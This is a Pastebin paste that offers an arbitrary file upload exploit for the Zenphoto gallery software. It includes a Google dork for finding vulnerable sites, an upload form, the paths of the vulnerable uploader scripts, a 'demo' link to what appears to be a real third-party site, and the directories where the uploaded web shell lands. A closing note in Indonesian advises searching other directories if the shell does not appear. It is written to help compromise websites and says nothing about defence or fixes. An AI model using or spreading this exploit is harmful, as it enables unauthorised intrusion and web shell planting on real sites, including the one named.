Advertisement
anoaghost

Zenphoto - Arbitrary File Upload Vulnerability

Jul 19th, 2016
298
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.90 KB | None | 0 0
  1. # Exploit Title: Zenphoto - Arbitrary File Upload Vulnerability
  2. # Google Dork: inurl:/zp-core/setup/
  3. # Date: 19/07/2016
  4. # Affected Software: ZenPhoto (http://www.zenphoto.org/)
  5. # Version: Any Version
  6. # Tested on: Windows, Linux
  7. # Author : AnoaGhost
  8.  
  9. Exploit CSRF :
  10. <form method="post" action="http://site.com/path/" enctype="multipart/form-data">
  11. <input type="file" name="files[]"/>
  12. <input type="submit"></input></input></form>
  13.  
  14. Poc :
  15. http://site.com/path/zp-core/zp-extensions/uploader_jQuery/upload_form.php
  16. http://site.com/path/zp-core/zp-extensions/uploader_jQuery/uploader.php
  17.  
  18. Demo ?
  19. http://svisimaging.be/portfolio_gallery/zp-core/zp-extensions/uploader_jQuery/upload_form.php
  20.  
  21. Shell Path
  22. http://site.com/path/portfolio_gallery/
  23. http://site.com/path/portfolio_gallery/cache/Product/
  24.  
  25. *Note : Kalau sudah terupload, dan shellnya tidak muncul, cari di dir lain atau targetnya tidak vuln, begitu :)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement